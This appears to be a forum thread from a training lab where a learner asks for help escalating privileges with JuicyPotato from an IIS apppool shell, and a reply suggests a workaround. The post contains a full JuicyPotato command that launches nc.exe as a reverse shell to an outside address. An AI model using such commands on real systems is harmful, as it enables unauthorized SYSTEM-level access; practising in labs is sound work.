Windows Privilege Escalation Assessment Pt.1 Assistance

Hello,

I have probably spent 4-5 days now on escalating privileges to administrator. My understanding of the assessment is to use JuicyPotato, PrintSpoofer, RottenPotato, etc. However, no matter what I try, with different combination of commands, nothing seems to work for me. I have looked into all the discussion pages and even trying what has already been suggested, does not seem to work. I get to the part where I am on the server as the default IIS apppool/defaultapppool user with a powershell instance but cannot seem to get Juicy Potato to work. Here is the command I’ve tried with powershell but it does not work for me:
.\JP.exe -l 53375 -p C:\Windows\System32\cmd.exe -a "/c .\nc.exe 10.10.14.72 9999 -e cmd.exe" -t * -c 7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381

I end up always receiving the error of: “COM → recv failed with error: 10038”. Now I have tried this command in many different orders according to all the discussions posted here but nothing ever works. I have tried all the CLSID’s posted to here as well.

Could someone point me in the right direction or private message me.

I gave up on trying to get an nc shell from JuicyPotato. Rather, I run one SYSTEM level command at a time.

I used port 1337 like an earlier module stated; not sure how much that matters. With your command, rather than trying to run nc.exe, try a different command to grab the flag.txt file from the restricted location and place it in a more accessible location on the server. Also, the CLSID should be formatted like “{xxxxxx}”. Try some CLIDs for the correct OS from the list on on the OHPE github repo.

Not sure if this is the best way to do the lab, but after many hours, this worked for me so I’m sticking with it.